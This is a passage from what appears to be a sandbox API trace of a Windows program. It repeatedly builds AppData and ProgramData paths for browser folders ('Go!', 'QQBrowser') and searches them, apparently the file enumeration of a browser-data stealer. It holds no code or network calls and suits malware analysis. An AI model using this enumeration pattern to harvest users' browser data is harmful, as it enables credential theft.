lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming" [0163.910] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", lpString2="\\Go!" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Go!") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Go!" [0163.910] VirtualQuery (in: lpAddress=0x9252c8, lpBuffer=0x2dfa70, dwLength=0x1c | out: lpBuffer=0x2dfa70*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.910] GetProcessHeap () returned 0x8e0000 [0163.910] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9252c8 | out: hHeap=0x8e0000) returned 1 [0163.910] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Go!") returned 49 [0163.910] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Go!") returned 49 [0163.910] lstrlenW (lpString="\\*.*") returned 4 [0163.910] GetProcessHeap () returned 0x8e0000 [0163.910] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x6c) returned 0x909f48 [0163.910] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Go!" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Go!") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Go!" [0163.910] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Go!", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Go!\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Go!\\*.*" [0163.910] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Go!\\*.*", lpFindFileData=0x2df848 | out: lpFindFileData=0x2df848*(dwFileAttributes=0x926360, ftCreationTime.dwLowDateTime=0x8e0150, ftCreationTime.dwHighDateTime=0x926360, ftLastAccessTime.dwLowDateTime=0x8e0000, ftLastAccessTime.dwHighDateTime=0x8e0150, ftLastWriteTime.dwLowDateTime=0xa, ftLastWriteTime.dwHighDateTime=0xc, nFileSizeHigh=0x8e0150, nFileSizeLow=0x2000002, dwReserved0=0x909f43, dwReserved1=0x3d00003d, cFileName="\r", cAlternateFileName="勈\x92練-ိ\x07")) returned 0xffffffff [0163.910] VirtualQuery (in: lpAddress=0x909f48, lpBuffer=0x2df804, dwLength=0x1c | out: lpBuffer=0x2df804*(BaseAddress=0x909000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x1e000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.910] GetProcessHeap () returned 0x8e0000 [0163.910] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x909f48 | out: hHeap=0x8e0000) returned 1 [0163.910] VirtualQuery (in: lpAddress=0x911b98, lpBuffer=0x2dfa7c, dwLength=0x1c | out: lpBuffer=0x2dfa7c*(BaseAddress=0x911000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x16000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.910] GetProcessHeap () returned 0x8e0000 [0163.910] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x911b98 | out: hHeap=0x8e0000) returned 1 [0163.910] GetProcessHeap () returned 0x8e0000 [0163.910] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x208) returned 0x9252c8 [0163.910] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x9252c8 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 0x0 [0163.910] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 43 [0163.910] lstrlenW (lpString="\\Go!") returned 4 [0163.910] GetProcessHeap () returned 0x8e0000 [0163.911] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x60) returned 0x90a830 [0163.911] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local" [0163.911] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", lpString2="\\Go!" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Go!") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Go!" [0163.911] VirtualQuery (in: lpAddress=0x9252c8, lpBuffer=0x2dfa70, dwLength=0x1c | out: lpBuffer=0x2dfa70*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.911] GetProcessHeap () returned 0x8e0000 [0163.911] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9252c8 | out: hHeap=0x8e0000) returned 1 [0163.911] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Go!") returned 47 [0163.911] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Go!") returned 47 [0163.911] lstrlenW (lpString="\\*.*") returned 4 [0163.911] GetProcessHeap () returned 0x8e0000 [0163.911] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x68) returned 0x911b98 [0163.911] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Go!" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Go!") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Go!" [0163.911] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Go!", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Go!\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Go!\\*.*" [0163.911] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Go!\\*.*", lpFindFileData=0x2df848 | out: lpFindFileData=0x2df848*(dwFileAttributes=0x909f48, ftCreationTime.dwLowDateTime=0x8e0150, ftCreationTime.dwHighDateTime=0x90a94c, ftLastAccessTime.dwLowDateTime=0x8e0000, ftLastAccessTime.dwHighDateTime=0x8e0150, ftLastWriteTime.dwLowDateTime=0x2df870, ftLastWriteTime.dwHighDateTime=0x7607cb5c, nFileSizeHigh=0x8e0150, nFileSizeLow=0x2000002, dwReserved0=0x58, dwReserved1=0x10000010, cFileName="\r", cAlternateFileName="勈\x92練-ိ\x07")) returned 0xffffffff [0163.911] VirtualQuery (in: lpAddress=0x911b98, lpBuffer=0x2df804, dwLength=0x1c | out: lpBuffer=0x2df804*(BaseAddress=0x911000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x16000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.911] GetProcessHeap () returned 0x8e0000 [0163.911] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x911b98 | out: hHeap=0x8e0000) returned 1 [0163.911] VirtualQuery (in: lpAddress=0x90a830, lpBuffer=0x2dfa7c, dwLength=0x1c | out: lpBuffer=0x2dfa7c*(BaseAddress=0x90a000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x1d000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.911] GetProcessHeap () returned 0x8e0000 [0163.911] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x90a830 | out: hHeap=0x8e0000) returned 1 [0163.911] GetProcessHeap () returned 0x8e0000 [0163.911] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x208) returned 0x9252c8 [0163.911] SHGetFolderPathW (in: hwnd=0x0, csidl=35, hToken=0x0, dwFlags=0x0, pszPath=0x9252c8 | out: pszPath="C:\\ProgramData") returned 0x0 [0163.911] lstrlenW (lpString="C:\\ProgramData") returned 14 [0163.911] lstrlenW (lpString="\\Go!") returned 4 [0163.911] GetProcessHeap () returned 0x8e0000 [0163.911] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x26) returned 0x903bd8 [0163.911] lstrcatW (in: lpString1="", lpString2="C:\\ProgramData" | out: lpString1="C:\\ProgramData") returned="C:\\ProgramData" [0163.911] lstrcatW (in: lpString1="C:\\ProgramData", lpString2="\\Go!" | out: lpString1="C:\\ProgramData\\Go!") returned="C:\\ProgramData\\Go!" [0163.911] VirtualQuery (in: lpAddress=0x9252c8, lpBuffer=0x2dfa70, dwLength=0x1c | out: lpBuffer=0x2dfa70*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.911] GetProcessHeap () returned 0x8e0000 [0163.911] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9252c8 | out: hHeap=0x8e0000) returned 1 [0163.912] lstrlenW (lpString="C:\\ProgramData\\Go!") returned 18 [0163.912] lstrlenW (lpString="C:\\ProgramData\\Go!") returned 18 [0163.912] lstrlenW (lpString="\\*.*") returned 4 [0163.912] GetProcessHeap () returned 0x8e0000 [0163.912] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x2e) returned 0x914be0 [0163.912] lstrcatW (in: lpString1="", lpString2="C:\\ProgramData\\Go!" | out: lpString1="C:\\ProgramData\\Go!") returned="C:\\ProgramData\\Go!" [0163.912] lstrcatW (in: lpString1="C:\\ProgramData\\Go!", lpString2="\\*.*" | out: lpString1="C:\\ProgramData\\Go!\\*.*") returned="C:\\ProgramData\\Go!\\*.*" [0163.912] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Go!\\*.*", lpFindFileData=0x2df848 | out: lpFindFileData=0x2df848*(dwFileAttributes=0x7607cb17, ftCreationTime.dwLowDateTime=0xe, ftCreationTime.dwHighDateTime=0x90a94c, ftLastAccessTime.dwLowDateTime=0x66001e, ftLastAccessTime.dwHighDateTime=0x20, ftLastWriteTime.dwLowDateTime=0x2df870, ftLastWriteTime.dwHighDateTime=0x7607cb5c, nFileSizeHigh=0x8e75d0, nFileSizeLow=0x0, dwReserved0=0x1e, dwReserved1=0x7607c3d1, cFileName="", cAlternateFileName="勈\x92練-ိ\x07")) returned 0xffffffff [0163.912] VirtualQuery (in: lpAddress=0x914be0, lpBuffer=0x2df804, dwLength=0x1c | out: lpBuffer=0x2df804*(BaseAddress=0x914000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x13000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.912] GetProcessHeap () returned 0x8e0000 [0163.912] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x914be0 | out: hHeap=0x8e0000) returned 1 [0163.912] VirtualQuery (in: lpAddress=0x903bd8, lpBuffer=0x2dfa7c, dwLength=0x1c | out: lpBuffer=0x2dfa7c*(BaseAddress=0x903000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x24000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.912] GetProcessHeap () returned 0x8e0000 [0163.912] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x903bd8 | out: hHeap=0x8e0000) returned 1 [0163.912] GetProcessHeap () returned 0x8e0000 [0163.912] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x208) returned 0x9252c8 [0163.912] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x9252c8 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 0x0 [0163.912] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 45 [0163.912] lstrlenW (lpString="\\Go!") returned 4 [0163.912] GetProcessHeap () returned 0x8e0000 [0163.912] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x64) returned 0x911b98 [0163.912] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming" [0163.912] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", lpString2="\\Go!" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Go!") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Go!" [0163.912] VirtualQuery (in: lpAddress=0x9252c8, lpBuffer=0x2dfa70, dwLength=0x1c | out: lpBuffer=0x2dfa70*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.912] GetProcessHeap () returned 0x8e0000 [0163.912] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9252c8 | out: hHeap=0x8e0000) returned 1 [0163.912] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Go!") returned 49 [0163.912] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Go!") returned 49 [0163.912] lstrlenW (lpString="\\*.*") returned 4 [0163.912] GetProcessHeap () returned 0x8e0000 [0163.912] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x6c) returned 0x909f48 [0163.912] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Go!" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Go!") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Go!" [0163.913] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Go!", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Go!\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Go!\\*.*" [0163.913] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Go!\\*.*", lpFindFileData=0x2df848 | out: lpFindFileData=0x2df848*(dwFileAttributes=0x926360, ftCreationTime.dwLowDateTime=0x8e0150, ftCreationTime.dwHighDateTime=0x926360, ftLastAccessTime.dwLowDateTime=0x8e0000, ftLastAccessTime.dwHighDateTime=0x8e0150, ftLastWriteTime.dwLowDateTime=0xa, ftLastWriteTime.dwHighDateTime=0xc, nFileSizeHigh=0x8e0150, nFileSizeLow=0x2000002, dwReserved0=0x909f43, dwReserved1=0x3d00003d, cFileName="\r", cAlternateFileName="勈\x92練-ိ\x07")) returned 0xffffffff [0163.913] VirtualQuery (in: lpAddress=0x909f48, lpBuffer=0x2df804, dwLength=0x1c | out: lpBuffer=0x2df804*(BaseAddress=0x909000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x1e000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.913] GetProcessHeap () returned 0x8e0000 [0163.913] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x909f48 | out: hHeap=0x8e0000) returned 1 [0163.913] VirtualQuery (in: lpAddress=0x911b98, lpBuffer=0x2dfa7c, dwLength=0x1c | out: lpBuffer=0x2dfa7c*(BaseAddress=0x911000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x16000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.913] GetProcessHeap () returned 0x8e0000 [0163.913] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x911b98 | out: hHeap=0x8e0000) returned 1 [0163.913] GetProcessHeap () returned 0x8e0000 [0163.913] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x208) returned 0x9252c8 [0163.913] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x9252c8 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 0x0 [0163.913] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 43 [0163.913] lstrlenW (lpString="\\Go!") returned 4 [0163.913] GetProcessHeap () returned 0x8e0000 [0163.913] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x60) returned 0x90a830 [0163.913] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local" [0163.913] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", lpString2="\\Go!" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Go!") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Go!" [0163.913] VirtualQuery (in: lpAddress=0x9252c8, lpBuffer=0x2dfa70, dwLength=0x1c | out: lpBuffer=0x2dfa70*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.913] GetProcessHeap () returned 0x8e0000 [0163.913] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9252c8 | out: hHeap=0x8e0000) returned 1 [0163.913] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Go!") returned 47 [0163.913] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Go!") returned 47 [0163.913] lstrlenW (lpString="\\*.*") returned 4 [0163.913] GetProcessHeap () returned 0x8e0000 [0163.913] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x68) returned 0x911b98 [0163.913] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Go!" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Go!") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Go!" [0163.913] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Go!", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Go!\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Go!\\*.*" [0163.913] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Go!\\*.*", lpFindFileData=0x2df848 | out: lpFindFileData=0x2df848*(dwFileAttributes=0x909f48, ftCreationTime.dwLowDateTime=0x8e0150, ftCreationTime.dwHighDateTime=0x90a94c, ftLastAccessTime.dwLowDateTime=0x8e0000, ftLastAccessTime.dwHighDateTime=0x8e0150, ftLastWriteTime.dwLowDateTime=0x2df870, ftLastWriteTime.dwHighDateTime=0x7607cb5c, nFileSizeHigh=0x8e0150, nFileSizeLow=0x2000002, dwReserved0=0x58, dwReserved1=0x10000010, cFileName="\r", cAlternateFileName="勈\x92練-ိ\x07")) returned 0xffffffff [0163.913] VirtualQuery (in: lpAddress=0x911b98, lpBuffer=0x2df804, dwLength=0x1c | out: lpBuffer=0x2df804*(BaseAddress=0x911000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x16000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.914] GetProcessHeap () returned 0x8e0000 [0163.914] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x911b98 | out: hHeap=0x8e0000) returned 1 [0163.914] VirtualQuery (in: lpAddress=0x90a830, lpBuffer=0x2dfa7c, dwLength=0x1c | out: lpBuffer=0x2dfa7c*(BaseAddress=0x90a000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x1d000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.914] GetProcessHeap () returned 0x8e0000 [0163.914] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x90a830 | out: hHeap=0x8e0000) returned 1 [0163.914] GetProcessHeap () returned 0x8e0000 [0163.914] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x208) returned 0x9252c8 [0163.914] SHGetFolderPathW (in: hwnd=0x0, csidl=35, hToken=0x0, dwFlags=0x0, pszPath=0x9252c8 | out: pszPath="C:\\ProgramData") returned 0x0 [0163.914] lstrlenW (lpString="C:\\ProgramData") returned 14 [0163.914] lstrlenW (lpString="\\Go!") returned 4 [0163.914] GetProcessHeap () returned 0x8e0000 [0163.914] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x26) returned 0x903bd8 [0163.914] lstrcatW (in: lpString1="", lpString2="C:\\ProgramData" | out: lpString1="C:\\ProgramData") returned="C:\\ProgramData" [0163.914] lstrcatW (in: lpString1="C:\\ProgramData", lpString2="\\Go!" | out: lpString1="C:\\ProgramData\\Go!") returned="C:\\ProgramData\\Go!" [0163.914] VirtualQuery (in: lpAddress=0x9252c8, lpBuffer=0x2dfa70, dwLength=0x1c | out: lpBuffer=0x2dfa70*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.914] GetProcessHeap () returned 0x8e0000 [0163.914] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9252c8 | out: hHeap=0x8e0000) returned 1 [0163.914] lstrlenW (lpString="C:\\ProgramData\\Go!") returned 18 [0163.914] lstrlenW (lpString="C:\\ProgramData\\Go!") returned 18 [0163.914] lstrlenW (lpString="\\*.*") returned 4 [0163.914] GetProcessHeap () returned 0x8e0000 [0163.914] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x2e) returned 0x914be0 [0163.914] lstrcatW (in: lpString1="", lpString2="C:\\ProgramData\\Go!" | out: lpString1="C:\\ProgramData\\Go!") returned="C:\\ProgramData\\Go!" [0163.914] lstrcatW (in: lpString1="C:\\ProgramData\\Go!", lpString2="\\*.*" | out: lpString1="C:\\ProgramData\\Go!\\*.*") returned="C:\\ProgramData\\Go!\\*.*" [0163.914] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Go!\\*.*", lpFindFileData=0x2df848 | out: lpFindFileData=0x2df848*(dwFileAttributes=0x7607cb17, ftCreationTime.dwLowDateTime=0xe, ftCreationTime.dwHighDateTime=0x90a94c, ftLastAccessTime.dwLowDateTime=0x5c001e, ftLastAccessTime.dwHighDateTime=0x22, ftLastWriteTime.dwLowDateTime=0x2df870, ftLastWriteTime.dwHighDateTime=0x7607cb5c, nFileSizeHigh=0x8e75d0, nFileSizeLow=0x0, dwReserved0=0x1e, dwReserved1=0x7607c3d1, cFileName="", cAlternateFileName="勈\x92練-ိ\x07")) returned 0xffffffff [0163.914] VirtualQuery (in: lpAddress=0x914be0, lpBuffer=0x2df804, dwLength=0x1c | out: lpBuffer=0x2df804*(BaseAddress=0x914000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x13000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.914] GetProcessHeap () returned 0x8e0000 [0163.914] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x914be0 | out: hHeap=0x8e0000) returned 1 [0163.914] VirtualQuery (in: lpAddress=0x903bd8, lpBuffer=0x2dfa7c, dwLength=0x1c | out: lpBuffer=0x2dfa7c*(BaseAddress=0x903000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x24000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.914] GetProcessHeap () returned 0x8e0000 [0163.914] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x903bd8 | out: hHeap=0x8e0000) returned 1 [0163.915] IStream:RemoteSeek (in: This=0x9043c0, dlibMove=0x0, dwOrigin=0x0, plibNewPosition=0x2 | out: plibNewPosition=0x2) returned 0x0 [0163.915] IStream:SetSize (This=0x9043c0, libNewSize=0x2ff) returned 0x0 [0163.915] IStream:RemoteSeek (in: This=0x9043c0, dlibMove=0x2ff, dwOrigin=0x0, plibNewPosition=0x0 | out: plibNewPosition=0x0) returned 0x0 [0163.915] IStream:RemoteSeek (in: This=0x9043c0, dlibMove=0x0, dwOrigin=0x0, plibNewPosition=0x2 | out: plibNewPosition=0x2) returned 0x0 [0163.915] IStream:RemoteSeek (in: This=0x9043c0, dlibMove=0x0, dwOrigin=0x0, plibNewPosition=0x1 | out: plibNewPosition=0x1) returned 0x0 [0163.915] ISequentialStream:RemoteWrite (in: This=0x9043c0, pv=0x2dfadc*=0x0, cb=0x4, pcbWritten=0x2dfad0 | out: pcbWritten=0x2dfad0*=0x4) returned 0x0 [0163.915] ISequentialStream:RemoteWrite (in: This=0x9043c0, pv=0x2dfae8*=0x8, cb=0x2, pcbWritten=0x2dfad0 | out: pcbWritten=0x2dfad0*=0x2) returned 0x0 [0163.915] ISequentialStream:RemoteWrite (in: This=0x9043c0, pv=0x2dfaec*=0x0, cb=0x2, pcbWritten=0x2dfad0 | out: pcbWritten=0x2dfad0*=0x2) returned 0x0 [0163.915] GetProcessHeap () returned 0x8e0000 [0163.915] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x208) returned 0x9252c8 [0163.915] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x9252c8 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 0x0 [0163.915] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 45 [0163.915] lstrlenW (lpString="\\QQBrowser") returned 10 [0163.915] GetProcessHeap () returned 0x8e0000 [0163.915] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x70) returned 0x909f48 [0163.915] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming" [0163.915] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", lpString2="\\QQBrowser" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\QQBrowser") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\QQBrowser" [0163.915] VirtualQuery (in: lpAddress=0x9252c8, lpBuffer=0x2dfa70, dwLength=0x1c | out: lpBuffer=0x2dfa70*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.915] GetProcessHeap () returned 0x8e0000 [0163.915] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9252c8 | out: hHeap=0x8e0000) returned 1 [0163.915] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\QQBrowser") returned 55 [0163.915] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\QQBrowser") returned 55 [0163.915] lstrlenW (lpString="\\*.*") returned 4 [0163.915] GetProcessHeap () returned 0x8e0000 [0163.915] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x78) returned 0x8efeb0 [0163.916] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\QQBrowser" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\QQBrowser") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\QQBrowser" [0163.916] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\QQBrowser", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\QQBrowser\\*.*") returned="C:\\Users\\5p5NrGJn0jS 